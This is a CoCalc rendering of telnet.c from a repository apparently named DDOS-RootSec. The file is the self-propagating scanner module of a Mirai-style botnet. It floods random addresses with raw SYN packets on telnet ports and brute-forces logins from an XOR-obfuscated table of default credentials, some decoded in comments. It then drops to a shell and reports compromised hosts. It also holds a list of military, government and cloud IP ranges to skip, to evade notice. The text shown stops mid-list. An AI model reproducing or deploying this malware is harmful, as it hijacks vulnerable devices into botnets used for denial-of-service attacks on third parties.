Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Self Reps/Telnet/telnet.c
5038 views
1
#define _GNU_SOURCE

2


3
#ifdef REKAI_TELNET

4


5
#ifdef DEBUG

6
#include <stdio.h>

7
#endif

8
#include <unistd.h>

9
#include <stdlib.h>

10
#include <sys/socket.h>

11
#include <arpa/inet.h>

12
#include <sys/select.h>

13
#include <sys/types.h>

14
#include <time.h>

15
#include <fcntl.h>

16
#include <signal.h>

17
#include <errno.h>

18
#include <string.h>

19
#include <linux/ip.h>

20
#include <linux/tcp.h>

21


22
#include "headers/includes.h"

23
#include "headers/scanner.h"

24
#include "headers/table.h"

25
#include "headers/rand.h"

26
#include "headers/util.h"

27
#include "headers/checksum.h"

28
#include "headers/resolv.h"

29


30
int scanner_pid, rsck, rsck_out, auth_table_len = 0;

31
char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};

32
struct scanner_auth *auth_table = NULL;

33
struct scanner_connection *conn_table;

34
uint16_t auth_table_max_weight = 0;

35
uint32_t fake_time = 0;

36


37
int recv_strip_null(int sock, void *buf, int len, int flags)

38
{

39
    int ret = recv(sock, buf, len, flags);

40


41
    if (ret > 0)

42
    {

43
        int i = 0;

44


45
        for(i = 0; i < ret; i++)

46
        {

47
            if (((char *)buf)[i] == 0x00)

48
            {

49
                ((char *)buf)[i] = 'A';

50
            }

51
        }

52
    }

53


54
    return ret;

55
}

56


57
void scanner_init(void)

58
{

59
    int i;

60
    uint16_t source_port;

61
    struct iphdr *iph;

62
    struct tcphdr *tcph;

63


64
    // Let parent  continue on main thread

65
    // Let parent continue on main thread

66
    scanner_pid = fork();

67
    if (scanner_pid > 0 || scanner_pid == -1)

68
        return;

69


70
    LOCAL_ADDR = util_local_addr();

71


72
    rand_init();

73
    fake_time = time(NULL);

74
    conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));

75
    for (i = 0; i < SCANNER_MAX_CONNS; i++)

76
    {

77
        conn_table[i].state = SC_CLOSED;

78
        conn_table[i].fd = -1;

79
    }

80


81
    // Set up raw socket scanning and payload

82
    if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)

83
    {

84
#ifdef DEBUG

85
        printf("[scanner] Failed to initialize raw socket, cannot scan\n");

86
#endif

87
        exit(0);

88
    }

89
    fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));

90
    i = 1;

91
    if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)

92
    {

93
#ifdef DEBUG

94
        printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");

95
#endif

96
        close(rsck);

97
        exit(0);

98
    }

99


100
    do

101
    {

102
        source_port = rand_next() & 0xffff;

103
    }

104
    while (ntohs(source_port) < 1024);

105


106
    iph = (struct iphdr *)scanner_rawpkt;

107
    tcph = (struct tcphdr *)(iph + 1);

108


109
    // Set up IPv4 header

110
    iph->ihl = 5;

111
    iph->version = 4;

112
    iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));

113
    iph->id = rand_next();

114
    iph->ttl = 64;

115
    iph->protocol = IPPROTO_TCP;

116


117
    // Set up TCP header

118
    tcph->dest = htons(23);

119
    tcph->source = source_port;

120
    tcph->doff = 5;

121
    tcph->window = rand_next() & 0xffff;

122
    tcph->syn = TRUE;

123


124
   // Set up passwords

125


126
    add_auth_entry("\x37\x2A\x2A\x31", "", 5);

127
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x24\x21\x28\x2C\x2B", 10);

128
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x74\x77\x76\x71", 9);

129
    add_auth_entry("\x24\x21\x28\x2C\x2B", "", 5);

130
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x35\x24\x36\x36", 9);

131
    add_auth_entry("\x37\x2A\x2A\x31", "\x3D\x26\x76\x70\x74\x74", 11);

132
    add_auth_entry("\x37\x2A\x2A\x31", "\x33\x2C\x3F\x3D\x33", 11);

133
    add_auth_entry("\x37\x2A\x2A\x31", "\x24\x2B\x31\x36\x29\x34", 11);

134
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x75\x75\x74\x26\x2D\x2C\x2B", 13);

135
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x70\x73", 11);

136
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76", 8);

137
    add_auth_entry("\x30\x36\x20\x37", "\x30\x36\x20\x37", 8);

138
    add_auth_entry("\x36\x30\x35\x35\x2A\x37\x31", "\x36\x30\x35\x35\x2A\x37\x31", 14);

139
    add_auth_entry("\x74\x77\x76\x71", "\x74\x77\x76\x71", 8);

140
    add_auth_entry("\x37\x2A\x2A\x31", "\x70\x30\x35", 7);

141
    add_auth_entry("\x21\x20\x23\x24\x30\x29\x31", "", 7);

142
    add_auth_entry("\x37\x2A\x2A\x31", "\x21\x20\x23\x24\x30\x29\x31", 11);

143
    add_auth_entry("\x24\x21\x28", "", 3);

144
    add_auth_entry("\x21\x24\x20\x28\x2A\x2B", "", 7);

145
    add_auth_entry("\x27\x2C\x2B", "", 3);

146
    add_auth_entry("\x37\x2A\x2A\x31", "\x24\x2B\x2E\x2A", 8);

147
    add_auth_entry("\x37\x2A\x2A\x31", "\x2D\x30\x2B\x31\x70\x72\x70\x7C", 12);

148
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x74\x77\x76\x71", 12);

149
    add_auth_entry("\x37\x2A\x2A\x31", "\x31\x31\x2B\x20\x31", 9);

150
    add_auth_entry("\x37\x2A\x2A\x31", "\x3F\x29\x3D\x3D\x6B", 9);

151
    add_auth_entry("\x37\x2A\x2A\x31", "\x37\x2A\x2A\x31", 8);

152
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x71\x70", 9);

153
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x24\x34\x30\x24\x37\x2C\x2A", 12);

154
    add_auth_entry("\x27\x24\x27\x3C", "\x27\x24\x27\x3C", 8);

155
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x31\x37\x30\x20", 9);

156
    add_auth_entry("\x24\x21\x28\x2C\x2B", "\x26\x2D\x24\x2B\x22\x20\x28\x20", 13);

157
    add_auth_entry("\x37\x2A\x2A\x31", "\x26\x2D\x24\x2B\x22\x20\x28\x20", 12);

158
    add_auth_entry("\x37\x2A\x2A\x31", "\x74\x77\x76\x74\x77\x76", 10);

159
	add_auth_entry("\x37\x2A\x2A\x31", "\x09\x16\x2C\x30\x1C\x72\x35\x0A\x28\x1F\x02\x77\x36", 17); // root:LSiuY7pOmZG2s

160
	add_auth_entry("\x24\x21\x28\x2C\x2B", "\x77\x73\x75\x74\x2D\x3D", 11); // admin:2601hx

161
	add_auth_entry("\x37\x2A\x2A\x31", "\x31\x75\x31\x24\x29\x26\x75\x2B\x31\x37\x75\x29\x71\x64\x45", 19); // root:t0talc0ntr0l4!

162
	add_auth_entry("\x21\x20", "", 4);  

163
	add_auth_entry("\x37\x2A\x2A\x31", "\x16\x77", 4);  // de:S2

164
	add_auth_entry("\x24\x21\x28", "", 3);  // adm:

165
	add_auth_entry("\x37\x2A\x2A\x31", "\x2C\x35\x26\x24\x28\x1A\x37\x31\x70\x76\x70\x75", 16);  

166
	

167
#ifdef DEBUG

168
    printf("[scanner] Scanner process initialized. Scanning started.\n");

169
#endif

170


171
    // Main logic loop

172
    while (TRUE)

173
    {

174
        fd_set fdset_rd, fdset_wr;

175
        struct scanner_connection *conn;

176
        struct timeval tim;

177
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

178


179
        // Spew out SYN to try and get a response

180
        if (fake_time != last_spew)

181
        {

182
            last_spew = fake_time;

183


184
            for (i = 0; i < SCANNER_RAW_PPS; i++)

185
            {

186
                struct sockaddr_in paddr = {0};

187
                struct iphdr *iph = (struct iphdr *)scanner_rawpkt;

188
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

189


190
                iph->id = rand_next();

191
                iph->saddr = LOCAL_ADDR;

192
                iph->daddr = get_random_ip();

193
                iph->check = 0;

194
                iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

195


196
                if (i % 10 == 0)

197
                {

198
                    tcph->dest = htons(2323);

199
                }

200
                else

201
                {

202
                    tcph->dest = htons(23);

203
                }

204
                tcph->seq = iph->daddr;

205
                tcph->check = 0;

206
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));

207


208
                paddr.sin_family = AF_INET;

209
                paddr.sin_addr.s_addr = iph->daddr;

210
                paddr.sin_port = tcph->dest;

211


212
                sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));

213
            }

214
        }

215


216
        // Read packets from raw socket to get SYN+ACKs

217
        last_avail_conn = 0;

218
        while (TRUE)

219
        {

220
            int n;

221
            char dgram[1514];

222
            struct iphdr *iph = (struct iphdr *)dgram;

223
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

224
            struct scanner_connection *conn;

225


226
            errno = 0;

227
            n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);

228
            if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)

229
                break;

230


231
            if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))

232
                continue;

233
            if (iph->daddr != LOCAL_ADDR)

234
                continue;

235
            if (iph->protocol != IPPROTO_TCP)

236
                continue;

237
            if (tcph->source != htons(23) && tcph->source != htons(2323))

238
                continue;

239
            if (tcph->dest != source_port)

240
                continue;

241
            if (!tcph->syn)

242
                continue;

243
            if (!tcph->ack)

244
                continue;

245
            if (tcph->rst)

246
                continue;

247
            if (tcph->fin)

248
                continue;

249
            if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)

250
                continue;

251


252
            conn = NULL;

253
            for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)

254
            {

255
                if (conn_table[n].state == SC_CLOSED)

256
                {

257
                    conn = &conn_table[n];

258
                    last_avail_conn = n;

259
                    break;

260
                }

261
            }

262


263
            // If there were no slots, then no point reading any more

264
            if (conn == NULL)

265
                break;

266


267
            conn->dst_addr = iph->saddr;

268
            conn->dst_port = tcph->source;

269
            setup_connection(conn);

270
#ifdef DEBUG

271
            printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);

272
#endif

273
        }

274


275
        // Load file descriptors into fdsets

276
        FD_ZERO(&fdset_rd);

277
        FD_ZERO(&fdset_wr);

278
        for (i = 0; i < SCANNER_MAX_CONNS; i++)

279
        {

280
            int timeout;

281


282
            conn = &conn_table[i];

283
            timeout = (conn->state > SC_CONNECTING ? 30 : 5);

284


285
            if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)

286
            {

287
#ifdef DEBUG

288
                printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);

289
#endif

290
                close(conn->fd);

291
                conn->fd = -1;

292


293
                // Retry

294
                if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again

295
                {

296
                    if (++(conn->tries) == 10)

297
                    {

298
                        conn->tries = 0;

299
                        conn->state = SC_CLOSED;

300
                    }

301
                    else

302
                    {

303
                        setup_connection(conn);

304
#ifdef DEBUG

305
                        printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);

306
#endif

307
                    }

308
                }

309
                else

310
                {

311
                    conn->tries = 0;

312
                    conn->state = SC_CLOSED;

313
                }

314
                continue;

315
            }

316


317
            if (conn->state == SC_CONNECTING)

318
            {

319
                FD_SET(conn->fd, &fdset_wr);

320
                if (conn->fd > mfd_wr)

321
                    mfd_wr = conn->fd;

322
            }

323
            else if (conn->state != SC_CLOSED)

324
            {

325
                FD_SET(conn->fd, &fdset_rd);

326
                if (conn->fd > mfd_rd)

327
                    mfd_rd = conn->fd;

328
            }

329
        }

330


331
        tim.tv_usec = 0;

332
        tim.tv_sec = 1;

333
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);

334
        fake_time = time(NULL);

335


336
        for (i = 0; i < SCANNER_MAX_CONNS; i++)

337
        {

338
            conn = &conn_table[i];

339


340
            if (conn->fd == -1)

341
                continue;

342


343
            if (FD_ISSET(conn->fd, &fdset_wr))

344
            {

345
                int err = 0, ret = 0;

346
                socklen_t err_len = sizeof (err);

347


348
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);

349
                if (err == 0 && ret == 0)

350
                {

351
                    conn->state = SC_HANDLE_IACS;

352
                    conn->auth = random_auth_entry();

353
                    conn->rdbuf_pos = 0;

354
#ifdef DEBUG

355
                    printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);

356
#endif

357
                }

358
                else

359
                {

360
#ifdef DEBUG

361
                    printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);

362
#endif

363
                    close(conn->fd);

364
                    conn->fd = -1;

365
                    conn->tries = 0;

366
                    conn->state = SC_CLOSED;

367
                    continue;

368
                }

369
            }

370


371
            if (FD_ISSET(conn->fd, &fdset_rd))

372
            {

373
                while (TRUE)

374
                {

375
                    int ret;

376


377
                    if (conn->state == SC_CLOSED)

378
                        break;

379


380
                    if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)

381
                    {

382
                        memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);

383
                        conn->rdbuf_pos -= SCANNER_HACK_DRAIN;

384
                    }

385
                    errno = 0;

386
                    ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);

387
                    if (ret == 0)

388
                    {

389
#ifdef DEBUG

390
                        printf("[scanner] FD%d connection gracefully closed\n", conn->fd);

391
#endif

392
                        errno = ECONNRESET;

393
                        ret = -1; // Fall through to closing connection below

394
                    }

395
                    if (ret == -1)

396
                    {

397
                        if (errno != EAGAIN && errno != EWOULDBLOCK)

398
                        {

399
#ifdef DEBUG

400
                            printf("[scanner] FD%d lost connection\n", conn->fd);

401
#endif

402
                            close(conn->fd);

403
                            conn->fd = -1;

404


405
                            // Retry

406
                            if (++(conn->tries) >= 10)

407
                            {

408
                                conn->tries = 0;

409
                                conn->state = SC_CLOSED;

410
                            }

411
                            else

412
                            {

413
                                setup_connection(conn);

414
#ifdef DEBUG

415
                                printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);

416
#endif

417
                            }

418
                        }

419
                        break;

420
                    }

421
                    conn->rdbuf_pos += ret;

422
                    conn->last_recv = fake_time;

423


424
                    while (TRUE)

425
                    {

426
                        int consumed = 0;

427


428
                        switch (conn->state)

429
                        {

430
                        case SC_HANDLE_IACS:

431
                            if ((consumed = consume_iacs(conn)) > 0)

432
                            {

433
                                conn->state = SC_WAITING_USERNAME;

434
#ifdef DEBUG

435
                                printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);

436
#endif

437
                            }

438
                            break;

439
                        case SC_WAITING_USERNAME:

440
                            if ((consumed = consume_user_prompt(conn)) > 0)

441
                            {

442
                                send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);

443
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

444
                                conn->state = SC_WAITING_PASSWORD;

445
#ifdef DEBUG

446
                                printf("[scanner] FD%d received username prompt\n", conn->fd);

447
#endif

448
                            }

449
                            break;

450
                        case SC_WAITING_PASSWORD:

451
                            if ((consumed = consume_pass_prompt(conn)) > 0)

452
                            {

453
#ifdef DEBUG

454
                                printf("[scanner] FD%d received password prompt\n", conn->fd);

455
#endif

456


457
                                // Send password

458
                                send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);

459
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

460


461
                                conn->state = SC_WAITING_PASSWD_RESP;

462
                            }

463
                            break;

464
                        case SC_WAITING_PASSWD_RESP:

465
                            if ((consumed = consume_any_prompt(conn)) > 0)

466
                            {

467
                                char *tmp_str;

468
                                int tmp_len;

469


470
#ifdef DEBUG

471
                                printf("[scanner] FD%d received shell prompt\n", conn->fd);

472
#endif

473


474
                                // Send enable / system / shell / sh to session to drop into shell if needed

475
                                table_unlock_val(TABLE_SCAN_ENABLE);

476
                                tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);

477
                                send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);

478
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

479
                                table_lock_val(TABLE_SCAN_ENABLE);

480
                                conn->state = SC_WAITING_ENABLE_RESP;

481
                            }

482
                            break;

483
                        case SC_WAITING_ENABLE_RESP:

484
                            if ((consumed = consume_any_prompt(conn)) > 0)

485
                            {

486
                                char *tmp_str;

487
                                int tmp_len;

488


489
#ifdef DEBUG

490
                                printf("[scanner] FD%d received sh prompt\n", conn->fd);

491
#endif

492


493
                                table_unlock_val(TABLE_SCAN_SYSTEM);

494
                                tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);

495
                                send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);

496
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

497
                                table_lock_val(TABLE_SCAN_SYSTEM);

498


499
                                conn->state = SC_WAITING_SYSTEM_RESP;

500
                            }

501
                            break;

502
			case SC_WAITING_SYSTEM_RESP:

503
                            if ((consumed = consume_any_prompt(conn)) > 0)

504
                            {

505
                                char *tmp_str;

506
                                int tmp_len;

507


508
#ifdef DEBUG

509
                                printf("[scanner] FD%d received sh prompt\n", conn->fd);

510
#endif

511


512
                                table_unlock_val(TABLE_SCAN_SHELL);

513
                                tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);

514
                                send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);

515
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

516
                                table_lock_val(TABLE_SCAN_SHELL);

517


518
                                conn->state = SC_WAITING_SHELL_RESP;

519
                            }

520
                            break;

521
                        case SC_WAITING_SHELL_RESP:

522
                            if ((consumed = consume_any_prompt(conn)) > 0)

523
                            {

524
                                char *tmp_str;

525
                                int tmp_len;

526


527
#ifdef DEBUG

528
                                printf("[scanner] FD%d received enable prompt\n", conn->fd);

529
#endif

530


531
                                table_unlock_val(TABLE_SCAN_SH);

532
                                tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);

533
                                send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);

534
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

535
                                table_lock_val(TABLE_SCAN_SH);

536


537
                                conn->state = SC_WAITING_SH_RESP;

538
                            }

539
                            break;

540
                        case SC_WAITING_SH_RESP:

541
                            if ((consumed = consume_any_prompt(conn)) > 0)

542
                            {

543
                                char *tmp_str;

544
                                int tmp_len;

545


546
#ifdef DEBUG

547
                                printf("[scanner] FD%d received sh prompt\n", conn->fd);

548
#endif

549


550
                                // Send query string

551
                                table_unlock_val(TABLE_SCAN_QUERY);

552
                                tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);

553
                                send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);

554
                                send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);

555
                                table_lock_val(TABLE_SCAN_QUERY);

556


557
                                conn->state = SC_WAITING_TOKEN_RESP;

558
                            }

559
                            break;

560
                        case SC_WAITING_TOKEN_RESP:

561
                            consumed = consume_resp_prompt(conn);

562
                            if (consumed == -1)

563
                            {

564
#ifdef DEBUG

565
                                printf("[scanner] FD%d invalid username/password combo\n", conn->fd);

566
#endif

567
                                close(conn->fd);

568
                                conn->fd = -1;

569


570
                                // Retry

571
                                if (++(conn->tries) == 10)

572
                                {

573
                                    conn->tries = 0;

574
                                    conn->state = SC_CLOSED;

575
                                }

576
                                else

577
                                {

578
                                    setup_connection(conn);

579
#ifdef DEBUG

580
                                    printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);

581
#endif

582
                                }

583
                            }

584
                            else if (consumed > 0)

585
                            {

586
                                char *tmp_str;

587
                                int tmp_len;

588
#ifdef DEBUG

589
                                printf("[scanner] FD%d Found verified working telnet\n", conn->fd);

590
#endif

591
                                report_working(conn->dst_addr, conn->dst_port, conn->auth);

592
                                close(conn->fd);

593
                                conn->fd = -1;

594
                                conn->state = SC_CLOSED;

595
                            }

596
                            break;

597
                        default:

598
                            consumed = 0;

599
                            break;

600
                        }

601


602
                        // If no data was consumed, move on

603
                        if (consumed == 0)

604
                            break;

605
                        else

606
                        {

607
                            if (consumed > conn->rdbuf_pos)

608
                                consumed = conn->rdbuf_pos;

609


610
                            conn->rdbuf_pos -= consumed;

611
                            memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);

612
                        }

613
                    }

614
                }

615
            }

616
        }

617
    }

618
}

619


620
void scanner_kill(void)

621
{

622
    kill(scanner_pid, 9);

623
}

624


625
static void setup_connection(struct scanner_connection *conn)

626
{

627
    struct sockaddr_in addr = {0};

628


629
    if (conn->fd != -1)

630
        close(conn->fd);

631
    if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

632
    {

633
#ifdef DEBUG

634
        printf("[scanner] Failed to call socket()\n");

635
#endif

636
        return;

637
    }

638


639
    conn->rdbuf_pos = 0;

640
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));

641


642
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));

643


644
    addr.sin_family = AF_INET;

645
    addr.sin_addr.s_addr = conn->dst_addr;

646
    addr.sin_port = conn->dst_port;

647


648
    conn->last_recv = fake_time;

649
    conn->state = SC_CONNECTING;

650
    connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));

651
}

652


653


654
    static ipv4_t get_random_ip(void)

655
{

656
    uint32_t tmp;

657
    uint8_t o1, o2, o3, o4;

658


659
    do

660
    {

661
        tmp = rand_next();

662


663
        o1 = tmp & 0xff;

664
        o2 = (tmp >> 8) & 0xff;

665
        o3 = (tmp >> 16) & 0xff;

666
        o4 = (tmp >> 24) & 0xff;

667
    }

668
    while (o1 == 127 ||                                        //Loopback

669
          (o1 == 0) ||                                         //Invalid address space

670
          (o1 == 3) ||                                         //General Electric Company

671
          (o1 == 15 || o1 == 16) ||                            //Hewlett-Packard Company

672
          (o1 == 56) ||                                        //US Postal Service

673
          (o1 == 10) ||                                        //Internal network

674
          (o1 == 25) ||                                        //Some more

675
          (o1 == 49) ||                                        //Some more

676
          (o1 == 50) ||                                        //Some more

677
          (o1 == 137) ||                                       //Some more

678
          (o1 == 6) ||                                         //Department of Defense

679
          (o1 == 7) ||                                         //Department of Defense

680
          (o1 == 11) ||                                        //Department of Defense

681
          (o1 == 21) ||                                        //Department of Defense

682
          (o1 == 22) ||                                        //Department of Defense

683
          (o1 == 26) ||                                        //Department of Defense

684
          (o1 == 28) ||                                        //Department of Defense

685
          (o1 == 29) ||                                        //Department of Defense

686
          (o1 == 30) ||                                        //Department of Defense

687
          (o1 == 33) ||                                        //Department of Defense

688
          (o1 == 55) ||                                        //Department of Defense

689
          (o1 == 214) ||                                       //Department of Defense

690
          (o1 == 215) ||                                       //Department of Defense

691
          (o1 == 192 && o2 == 168) ||                          //Internal network

692
          (o1 == 172 && o2 >= 16 && o2 < 32) ||                //Internal network

693
          (o1 == 100 && o2 >= 64 && o2 < 127) ||               //IANA NAT reserved

694
          (o1 == 169 && o2 > 254) ||                           //IANA NAT reserved

695
          (o1 == 198 && o2 >= 18 && o2 < 20) ||                //IANA Special use

696
          (o1 == 146 && o2 == 17) ||                           //Some more

697
          (o1 == 146 && o2 == 80) ||                           //Some more

698
          (o1 == 146 && o2 == 98) ||                           //Some more

699
          (o1 == 146 && o2 == 154) ||                          //Some more

700
          (o1 == 147 && o2 == 159) ||                          //Some more

701
          (o1 == 148 && o2 == 114) ||                          //Some more

702
          (o1 == 150 && o2 == 125) ||                          //Some more

703
          (o1 == 150 && o2 == 133) ||                          //Some more

704
          (o1 == 150 && o2 == 144) ||                          //Some more

705
          (o1 == 150 && o2 == 149) ||                          //Some more

706
          (o1 == 150 && o2 == 157) ||                          //Some more

707
          (o1 == 150 && o2 == 184) ||                          //Some more

708
          (o1 == 150 && o2 == 190) ||                          //Some more

709
          (o1 == 150 && o2 == 196) ||                          //Some more

710
          (o1 == 152 && o2 == 82) ||                           //Some more

711
          (o1 == 152 && o2 == 229) ||                          //Some more

712
          (o1 == 157 && o2 == 202) ||                          //Some more

713
          (o1 == 157 && o2 == 217) ||                          //Some more

714
          (o1 == 161 && o2 == 124) ||                          //Some more

715
          (o1 == 162 && o2 == 32) ||                           //Some more

716
          (o1 == 155 && o2 == 96) ||                           //Some more

717
          (o1 == 155 && o2 == 149) ||                          //Some more

718
          (o1 == 155 && o2 == 155) ||                          //Some more

719
          (o1 == 155 && o2 == 178) ||                          //Some more

720
          (o1 == 164 && o2 == 158) ||                          //Some more

721
          (o1 == 156 && o2 == 9) ||                            //Some more

722
          (o1 == 167 && o2 == 44) ||                           //Some more

723
          (o1 == 168 && o2 == 68) ||                           //Some more

724
          (o1 == 168 && o2 == 85) ||                           //Some more

725
          (o1 == 168 && o2 == 102) ||                          //Some more

726
          (o1 == 203 && o2 == 59) ||                           //Some more

727
          (o1 == 204 && o2 == 34) ||                           //Some more

728
          (o1 == 207 && o2 == 30) ||                           //Some more

729
          (o1 == 117 && o2 == 55) ||                           //Some more

730
          (o1 == 117 && o2 == 56) ||                           //Some more

731
          (o1 == 80 && o2 == 235) ||                           //Some more

732
          (o1 == 207 && o2 == 120) ||                          //Some more

733
          (o1 == 209 && o2 == 35) ||                           //Some more

734
          (o1 == 64 && o2 == 70) ||                            //Some more

735
          (o1 == 64 && o2 >= 69 && o2 < 227) ||                //Some more

736
          (o1 == 128 && o2 >= 35 && o2 < 237) ||               //Some more

737
          (o1 == 129 && o2 >= 22 && o2 < 255) ||               //Some more

738
          (o1 == 130 && o2 >= 40 && o2 < 168) ||               //Some more

739
          (o1 == 131 && o2 >= 3 && o2 < 251) ||                //Some more

740
          (o1 == 132 && o2 >= 3 && o2 < 251) ||                //Some more

741
          (o1 == 134 && o2 >= 5 && o2 < 235) ||                //Some more

742
          (o1 == 136 && o2 >= 177 && o2 < 223) ||              //Some more

743
          (o1 == 138 && o2 >= 13 && o2 < 194) ||               //Some more

744
          (o1 == 139 && o2 >= 31 && o2 < 143) ||               //Some more

745
          (o1 == 140 && o2 >= 1 && o2 < 203) ||                //Some more

746
          (o1 == 143 && o2 >= 45 && o2 < 233) ||               //Some more

747
          (o1 == 144 && o2 >= 99 && o2 < 253) ||               //Some more

748
          (o1 == 146 && o2 >= 165 && o2 < 166) ||              //Some more

749
          (o1 == 147 && o2 >= 35 && o2 < 43) ||                //Some more

750
          (o1 == 147 && o2 >= 103 && o2 < 105) ||              //Some more

751
          (o1 == 147 && o2 >= 168 && o2 < 170) ||              //Some more

752
          (o1 == 147 && o2 >= 198 && o2 < 200) ||              //Some more

753
          (o1 == 147 && o2 >= 238 && o2 < 255) ||              //Some more

754
          (o1 == 150 && o2 >= 113 && o2 < 115) ||              //Some more

755
          (o1 == 152 && o2 >= 151 && o2 < 155) ||              //Some more

756
          (o1 == 153 && o2 >= 21 && o2 < 32) ||                //Some more

757
          (o1 == 155 && o2 >= 5 && o2 < 10) ||                 //Some more

758
          (o1 == 155 && o2 >= 74 && o2 < 89) ||                //Some more

759
          (o1 == 155 && o2 >= 213 && o2 < 222) ||              //Some more

760
          (o1 == 157 && o2 >= 150 && o2 < 154) ||              //Some more

761
          (o1 == 158 && o2 >= 1 && o2 < 21) ||                 //Some more

762
          (o1 == 158 && o2 >= 235 && o2 < 247) ||              //Some more

763
          (o1 == 159 && o2 >= 120 && o2 < 121) ||              //Some more

764
          (o1 == 160 && o2 >= 132 && o2 < 151) ||              //Some more

765
          (o1 == 64 && o2 >= 224 && o2 < 227) ||               //Some more

766
          (o1 == 162 && o2 >= 45 && o2 < 47) ||                //CIA 

767
          (o1 == 163 && o2 >= 205 && o2 < 207) ||              //NASA Kennedy Space Center

768
          (o1 == 164 && o2 >= 45 && o2 < 50) ||                //NASA Kennedy Space Center

769
          (o1 == 164 && o2 >= 217 && o2 < 233) ||              //NASA Kennedy Space Center

770
          (o1 == 169 && o2 >= 252 && o2 < 254) ||              //U.S. Department of State

771
          (o1 == 199 && o2 >= 121 && o2 < 254) ||              //Naval Air Systems Command, VA

772
          (o1 == 205 && o2 >= 1 && o2 < 118) ||                //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR

773
          (o1 == 207 && o2 >= 60 && o2 < 62) ||                //FBI controlled Linux servers & IPs/IP-Ranges

774
          (o1 == 104 && o2 >= 16 && o2 < 31) ||                //Cloudflare

775
          (o1 == 188 && o2 == 166) ||                          //Digital Ocean

776
          (o1 == 188 && o2 == 226) ||                          //Digital Ocean

777
          (o1 == 159 && o2 == 203) ||                          //Digital Ocean

778
          (o1 == 162 && o2 == 243) ||                          //Digital Ocean

779
          (o1 == 45 && o2 == 55) ||                            //Digital Ocean

780
